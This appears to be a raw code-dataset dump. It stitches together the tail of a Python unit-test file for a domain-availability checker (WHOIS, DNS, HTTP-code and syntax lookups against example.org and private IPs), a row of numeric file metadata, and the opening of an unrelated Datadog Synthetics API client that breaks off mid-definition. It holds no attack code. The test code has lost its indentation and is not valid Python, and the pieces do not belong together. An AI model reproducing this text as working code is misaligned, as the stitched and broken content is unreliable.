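# the standard library could look like the sketch below; PyFunceble's real logic is
# richer than this.
def _record_type_sketch(subject):
    import ipaddress

    try:
        ipaddress.ip_address(subject)
        return "PTR"
    except ValueError:
        return "NS"
# e.g. _record_type_sketch("192.168.1.1") == "PTR", _record_type_sketch("example.org") == "NS"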
def test_try_to_query_status_from_whois(self) -> None:
"""
Tests the method which tries to define the status from the WHOIS record.
"""
# In this test, we don't care about the database.
self.checker.use_whois_db = False
self.checker.subject = "example.org"
# Let's test the case that no expiration date is found.
self.checker.whois_query_tool.get_expiration_date = lambda: None
self.checker.whois_query_tool.lookup_record.record = None
self.checker.try_to_query_status_from_whois()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_whois_record = None
actual_whois_record = self.checker.status.whois_record
self.assertEqual(expected_whois_record, actual_whois_record)
# Let's test the case that an expiration date is actually given.
self.checker.whois_query_tool.get_expiration_date = lambda: "10-nov-1971"
self.checker.whois_query_tool.lookup_record.record = "Hello, World!"
self.checker.try_to_query_status_from_whois()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "WHOIS"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
expected_whois_record = "Hello, World!"
actual_whois_record = self.checker.status.whois_record
self.assertEqual(expected_whois_record, actual_whois_record)
def test_try_to_query_status_from_dns(self) -> None:
"""
Tests the method that tries to define the status from the DNS lookup.
"""
# Let's test the case that no answer is given back.
# pylint: disable=unnecessary-lambda
self.checker.subject = "example.org"
self.checker.query_dns_record = (
lambda: dict() # pylint: disable=use-dict-literal
)
self.checker.try_to_query_status_from_dns()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Let's test the case that an answer is given back.
self.checker.query_dns_record = lambda: {"NS": ["ns1.example.org"]}
self.checker.try_to_query_status_from_dns()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "DNSLOOKUP"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
def test_try_to_query_status_from_netinfo(self) -> None:
"""
Tests the method that tries to define the status from the NETINFO
lookup.
"""
# Let's test the case that nothing is given back.
self.checker.subject = "example.org"
self.checker.addressinfo_query_tool.get_info = lambda: None
self.checker.try_to_query_status_from_netinfo()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Let's test the case that an answer is given back.
self.checker.addressinfo_query_tool.get_info = lambda: ["192.168.1.1"]
self.checker.try_to_query_status_from_netinfo()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "NETINFO"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
# Now the same test but with an IP.
self.checker.subject = "192.168.1.1"
self.checker.hostbyaddr_query_tool.get_info = lambda: None
self.checker.try_to_query_status_from_netinfo()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Let's test the case that an answer is given back.
self.checker.hostbyaddr_query_tool.get_info = lambda: ["example.org"]
self.checker.try_to_query_status_from_netinfo()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "NETINFO"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
# Now a test with a digit string.
# This test exists because we shouldn't produce false positives.
self.checker.subject = "192"
self.checker.try_to_query_status_from_netinfo()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Now the same test as before, but for everything that may not exist
# publicly but may exist in the local network.
#
# Let's test the case that nothing is given back.
self.checker.subject = "example"
self.checker.addressinfo_query_tool.get_info = lambda: None
self.checker.try_to_query_status_from_netinfo()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Let's test the case that an answer is given back.
self.checker.addressinfo_query_tool.get_info = lambda: ["192.168.1.19"]
self.checker.try_to_query_status_from_netinfo()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "NETINFO"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
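# The netinfo test above walks three branches: domain-like subjects resolve
# through addressinfo_query_tool, IP subjects resolve through
# hostbyaddr_query_tool, and purely numeric strings such as "192" are
# rejected up front so they can never yield a false-positive ACTIVE status.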
def test_try_to_query_status_from_http_status_code(self) -> None:
"""
Tests the method that tries to define a status from the HTTP status
code.
"""
# Let's test the strange case where we encounter mailto:xxx@yyy.de.
self.checker.subject = "mailto:hello@world.de"
self.checker.http_status_code_query_tool.get_status_code = (
lambda: self.checker.http_status_code_query_tool.STD_UNKNOWN_STATUS_CODE
)
self.checker.try_to_query_status_from_http_status_code()
expected_subject = "mailto:hello@world.de"
actual_subject = self.checker.http_status_code_query_tool.subject
self.assertEqual(expected_subject, actual_subject)
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_status_code = None
actual_status_code = self.checker.status.http_status_code
self.assertEqual(expected_status_code, actual_status_code)
# Now, let's test a normal domain.
self.checker.subject = "example.org"
self.checker.http_status_code_query_tool.get_status_code = lambda: 200
self.checker.try_to_query_status_from_http_status_code()
expected_subject = "http://example.org:80"
actual_subject = self.checker.http_status_code_query_tool.subject
self.assertEqual(expected_subject, actual_subject)
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "HTTP CODE"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
def test_try_to_query_status_from_syntax_lookup(self) -> None:
"""
Tests the method that tries to define the status from the syntax lookup.
"""
# Let's check the case that the subject is a valid domain.
self.checker.subject = "example.com"
self.checker.try_to_query_status_from_syntax_lookup()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
# Let's check the case that the subject is an invalid one.
self.checker.subject = "102117110105108114121115"
self.checker.try_to_query_status_from_syntax_lookup()
expected_status = "INVALID"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_source = "SYNTAX"
actual_source = self.checker.status.status_source
self.assertEqual(expected_source, actual_source)
@staticmethod
def fake_pull_response(subject: str) -> dict:
"""
Provides a fake pull response to work with.
:param subject:
The subject to work with.
"""
return {
"subject": subject,
"id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
"status": {
"syntax": {
"latest": {
"status": "INVALID",
"status_source": "SYNTAX",
"tested_at": "2021-09-28T19:32:07.167Z",
"id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
},
"frequent": "VALID",
"recommended": "VALID",
},
"availability": {
"latest": {
"status": "INACTIVE",
"status_source": "DNSLOOKUP",
"tested_at": "2021-09-28T19:32:07.167Z",
"id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
},
"frequent": "ACTIVE",
"recommended": "ACTIVE",
},
"reputation": {
"latest": {
"status": "MALICIOUS",
"status_source": "REPUTATION",
"tested_at": "2021-09-28T19:32:07.167Z",
"id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
},
"frequent": "SANE",
"recommended": "MALICIOUS",
},
"whois": {
"expiration_date": "2021-09-28T19:32:07.167Z",
"id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
"subject_id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
},
},
}
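# The fake payload above mimics the collection API response: each category
# (syntax, availability, reputation) exposes a "latest" entry plus flat
# "frequent" and "recommended" values. The collection tests below assume the
# checker reads the availability block according to preferred_status_origin.
# A hedged sketch of that selection (variable names are illustrative only):
#
#     origin = self.collection_query_tool.preferred_status_origin
#     availability = pulled_data["status"]["availability"]
#     status = (
#         availability["latest"]["status"] if origin == "latest"
#         else availability[origin]
#     )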
@staticmethod
def fake_response_no_data(_: str) -> None:
"""
Provides an empty response.
"""
return None
def test_try_to_query_status_from_collection(self) -> None:
"""
Tests the method that tries to define the status from the collection lookup.
"""
# Let's check the case that the subject is known.
self.checker.subject = "example.com"
self.checker.collection_query_tool.preferred_status_origin = "frequent"
self.checker.collection_query_tool.pull = self.fake_pull_response
self.checker.try_to_query_status_from_collection()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_status_source = "COLLECTION"
actual_status_source = self.checker.status.status_source
self.assertEqual(expected_status_source, actual_status_source)
self.checker.collection_query_tool.preferred_status_origin = "latest"
self.checker.try_to_query_status_from_collection()
expected_status = "INACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_status_source = "COLLECTION"
actual_status_source = self.checker.status.status_source
self.assertEqual(expected_status_source, actual_status_source)
self.checker.collection_query_tool.preferred_status_origin = "recommended"
self.checker.try_to_query_status_from_collection()
expected_status = "ACTIVE"
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_status_source = "COLLECTION"
actual_status_source = self.checker.status.status_source
self.assertEqual(expected_status_source, actual_status_source)
# Let's check the case that the subject is unknown.
self.checker.subject = "102117110105108114121115"
self.checker.collection_query_tool.pull = self.fake_response_no_data
self.checker.try_to_query_status_from_collection()
expected_status = None
actual_status = self.checker.status.status
self.assertEqual(expected_status, actual_status)
expected_status_source = None
actual_status_source = self.checker.status.status_source
self.assertEqual(expected_status_source, actual_status_source)
def test_get_status(self) -> None:
"""
Tests the method that lets us get the whole status object.
"""
self.test_try_to_query_status_from_syntax_lookup()
actual = self.checker.get_status()
self.assertIsInstance(actual, AvailabilityCheckerStatus)
if __name__ == "__main__":
unittest.main()
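# A minimal way to run this suite on its own, assuming the module is
# importable from the repository root (replace the dotted path with the
# module's real location):
#
#     python -m unittest path.to.this_test_module -v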
| 30.498549 | 88 | 0.641492 | 5,069 | 42,027 | 5.158019 | 0.068061 | 0.085405 | 0.071254 | 0.035493 | 0.857187 | 0.846286 | 0.814427 | 0.778972 | 0.743096 | 0.708483 | 0 | 0.011411 | 0.272254 | 42,027 | 1,377 | 89 | 30.520697 | 0.830669 | 0.239608 | 0 | 0.600666 | 0 | 0 | 0.051694 | 0.013538 | 0 | 0 | 0 | 0 | 0.161398 | 1 | 0.114809 | false | 0 | 0.011647 | 0 | 0.131448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
72e19903a6c22df3eacfc58ab7c9c58c2899f1f4 | 88,264 | py | Python | src/datadog_api_client/v1/api/synthetics_api.py | rchenzheng/datadog-api-client-python | 2e86ac098c6f0c7fdd90ed218224587c0f8eafef | ["Apache-2.0"] | null | null | null | src/datadog_api_client/v1/api/synthetics_api.py | rchenzheng/datadog-api-client-python | 2e86ac098c6f0c7fdd90ed218224587c0f8eafef | ["Apache-2.0"] | null | null | null | src/datadog_api_client/v1/api/synthetics_api.py | rchenzheng/datadog-api-client-python | 2e86ac098c6f0c7fdd90ed218224587c0f8eafef | ["Apache-2.0"] | null | null | null | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
import re # noqa: F401
import sys # noqa: F401
from datadog_api_client.v1.api_client import ApiClient, Endpoint as _Endpoint
from datadog_api_client.v1.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types,
)
from datadog_api_client.v1.model.api_error_response import APIErrorResponse
from datadog_api_client.v1.model.synthetics_api_test import SyntheticsAPITest
from datadog_api_client.v1.model.synthetics_api_test_result_full import SyntheticsAPITestResultFull
from datadog_api_client.v1.model.synthetics_browser_test import SyntheticsBrowserTest
from datadog_api_client.v1.model.synthetics_browser_test_result_full import SyntheticsBrowserTestResultFull
from datadog_api_client.v1.model.synthetics_ci_test_body import SyntheticsCITestBody
from datadog_api_client.v1.model.synthetics_delete_tests_payload import SyntheticsDeleteTestsPayload
from datadog_api_client.v1.model.synthetics_delete_tests_response import SyntheticsDeleteTestsResponse
from datadog_api_client.v1.model.synthetics_get_api_test_latest_results_response import (
SyntheticsGetAPITestLatestResultsResponse,
)
from datadog_api_client.v1.model.synthetics_get_browser_test_latest_results_response import (
SyntheticsGetBrowserTestLatestResultsResponse,
)
from datadog_api_client.v1.model.synthetics_global_variable import SyntheticsGlobalVariable
from datadog_api_client.v1.model.synthetics_list_global_variables_response import SyntheticsListGlobalVariablesResponse
from datadog_api_client.v1.model.synthetics_list_tests_response import SyntheticsListTestsResponse
from datadog_api_client.v1.model.synthetics_locations import SyntheticsLocations
from datadog_api_client.v1.model.synthetics_private_location import SyntheticsPrivateLocation
from datadog_api_client.v1.model.synthetics_private_location_creation_response import (
SyntheticsPrivateLocationCreationResponse,
)
from datadog_api_client.v1.model.synthetics_test_details import SyntheticsTestDetails
from datadog_api_client.v1.model.synthetics_trigger_ci_tests_response import SyntheticsTriggerCITestsResponse
from datadog_api_client.v1.model.synthetics_update_test_pause_status_payload import (
SyntheticsUpdateTestPauseStatusPayload,
)
class SyntheticsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self._create_global_variable_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsGlobalVariable,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/variables",
"operation_id": "create_global_variable",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsGlobalVariable,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
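# Every endpoint below follows the same recipe: `settings` carries the return
# type, auth schemes, path and HTTP method; `params_map` lists the accepted
# and required parameters; `root_map` maps each parameter to its OpenAPI type
# and to where it travels (path, query or body); and `headers_map` pins the
# accepted and produced content types. The public methods at the bottom of
# the class only fill in kwargs and delegate to call_with_http_info().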
self._create_private_location_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsPrivateLocationCreationResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/private-locations",
"operation_id": "create_private_location",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsPrivateLocation,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._create_synthetics_api_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsAPITest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/api",
"operation_id": "create_synthetics_api_test",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsAPITest,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._create_synthetics_browser_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsBrowserTest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/browser",
"operation_id": "create_synthetics_browser_test",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsBrowserTest,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._delete_global_variable_endpoint = _Endpoint(
settings={
"response_type": None,
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/variables/{variable_id}",
"operation_id": "delete_global_variable",
"http_method": "DELETE",
"servers": None,
},
params_map={
"all": [
"variable_id",
],
"required": [
"variable_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"variable_id": (str,),
},
"attribute_map": {
"variable_id": "variable_id",
},
"location_map": {
"variable_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._delete_private_location_endpoint = _Endpoint(
settings={
"response_type": None,
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/private-locations/{location_id}",
"operation_id": "delete_private_location",
"http_method": "DELETE",
"servers": None,
},
params_map={
"all": [
"location_id",
],
"required": [
"location_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"location_id": (str,),
},
"attribute_map": {
"location_id": "location_id",
},
"location_map": {
"location_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._delete_tests_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsDeleteTestsResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/delete",
"operation_id": "delete_tests",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsDeleteTestsPayload,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._edit_global_variable_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsGlobalVariable,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/variables/{variable_id}",
"operation_id": "edit_global_variable",
"http_method": "PUT",
"servers": None,
},
params_map={
"all": [
"variable_id",
"body",
],
"required": [
"variable_id",
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"variable_id": (str,),
"body": (SyntheticsGlobalVariable,),
},
"attribute_map": {
"variable_id": "variable_id",
},
"location_map": {
"variable_id": "path",
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._get_api_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsAPITest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/api/{public_id}",
"operation_id": "get_api_test",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
],
"required": [
"public_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_api_test_latest_results_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsGetAPITestLatestResultsResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/{public_id}/results",
"operation_id": "get_api_test_latest_results",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
"from_ts",
"to_ts",
"probe_dc",
],
"required": [
"public_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"from_ts": (int,),
"to_ts": (int,),
"probe_dc": ([str],),
},
"attribute_map": {
"public_id": "public_id",
"from_ts": "from_ts",
"to_ts": "to_ts",
"probe_dc": "probe_dc",
},
"location_map": {
"public_id": "path",
"from_ts": "query",
"to_ts": "query",
"probe_dc": "query",
},
"collection_format_map": {
"probe_dc": "multi",
},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_api_test_result_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsAPITestResultFull,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/{public_id}/results/{result_id}",
"operation_id": "get_api_test_result",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
"result_id",
],
"required": [
"public_id",
"result_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"result_id": (str,),
},
"attribute_map": {
"public_id": "public_id",
"result_id": "result_id",
},
"location_map": {
"public_id": "path",
"result_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_browser_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsBrowserTest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/browser/{public_id}",
"operation_id": "get_browser_test",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
],
"required": [
"public_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_browser_test_latest_results_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsGetBrowserTestLatestResultsResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/browser/{public_id}/results",
"operation_id": "get_browser_test_latest_results",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
"from_ts",
"to_ts",
"probe_dc",
],
"required": [
"public_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"from_ts": (int,),
"to_ts": (int,),
"probe_dc": ([str],),
},
"attribute_map": {
"public_id": "public_id",
"from_ts": "from_ts",
"to_ts": "to_ts",
"probe_dc": "probe_dc",
},
"location_map": {
"public_id": "path",
"from_ts": "query",
"to_ts": "query",
"probe_dc": "query",
},
"collection_format_map": {
"probe_dc": "multi",
},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_browser_test_result_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsBrowserTestResultFull,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/browser/{public_id}/results/{result_id}",
"operation_id": "get_browser_test_result",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
"result_id",
],
"required": [
"public_id",
"result_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"result_id": (str,),
},
"attribute_map": {
"public_id": "public_id",
"result_id": "result_id",
},
"location_map": {
"public_id": "path",
"result_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_global_variable_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsGlobalVariable,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/variables/{variable_id}",
"operation_id": "get_global_variable",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"variable_id",
],
"required": [
"variable_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"variable_id": (str,),
},
"attribute_map": {
"variable_id": "variable_id",
},
"location_map": {
"variable_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_private_location_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsPrivateLocation,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/private-locations/{location_id}",
"operation_id": "get_private_location",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"location_id",
],
"required": [
"location_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"location_id": (str,),
},
"attribute_map": {
"location_id": "location_id",
},
"location_map": {
"location_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._get_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsTestDetails,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/{public_id}",
"operation_id": "get_test",
"http_method": "GET",
"servers": None,
},
params_map={
"all": [
"public_id",
],
"required": [
"public_id",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._list_global_variables_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsListGlobalVariablesResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/variables",
"operation_id": "list_global_variables",
"http_method": "GET",
"servers": None,
},
params_map={"all": [], "required": [], "nullable": [], "enum": [], "validation": []},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {},
"attribute_map": {},
"location_map": {},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._list_locations_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsLocations,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/locations",
"operation_id": "list_locations",
"http_method": "GET",
"servers": None,
},
params_map={"all": [], "required": [], "nullable": [], "enum": [], "validation": []},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {},
"attribute_map": {},
"location_map": {},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._list_tests_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsListTestsResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests",
"operation_id": "list_tests",
"http_method": "GET",
"servers": None,
},
params_map={"all": [], "required": [], "nullable": [], "enum": [], "validation": []},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {},
"attribute_map": {},
"location_map": {},
"collection_format_map": {},
},
headers_map={
"accept": ["application/json"],
"content_type": [],
},
api_client=api_client,
)
self._trigger_ci_tests_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsTriggerCITestsResponse,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/trigger/ci",
"operation_id": "trigger_ci_tests",
"http_method": "POST",
"servers": None,
},
params_map={
"all": [
"body",
],
"required": [
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"body": (SyntheticsCITestBody,),
},
"attribute_map": {},
"location_map": {
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._update_api_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsAPITest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/api/{public_id}",
"operation_id": "update_api_test",
"http_method": "PUT",
"servers": None,
},
params_map={
"all": [
"public_id",
"body",
],
"required": [
"public_id",
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"body": (SyntheticsAPITest,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._update_browser_test_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsBrowserTest,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/tests/browser/{public_id}",
"operation_id": "update_browser_test",
"http_method": "PUT",
"servers": None,
},
params_map={
"all": [
"public_id",
"body",
],
"required": [
"public_id",
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
"public_id": (str,),
"body": (SyntheticsBrowserTest,),
},
"attribute_map": {
"public_id": "public_id",
},
"location_map": {
"public_id": "path",
"body": "body",
},
"collection_format_map": {},
},
headers_map={"accept": ["application/json"], "content_type": ["application/json"]},
api_client=api_client,
)
self._update_private_location_endpoint = _Endpoint(
settings={
"response_type": (SyntheticsPrivateLocation,),
"auth": ["apiKeyAuth", "appKeyAuth"],
"endpoint_path": "/api/v1/synthetics/private-locations/{location_id}",
"operation_id": "update_private_location",
"http_method": "PUT",
"servers": None,
},
params_map={
"all": [
"location_id",
"body",
],
"required": [
"location_id",
"body",
],
"nullable": [],
"enum": [],
"validation": [],
},
root_map={
"validations": {},
"allowed_values": {},
"openapi_types": {
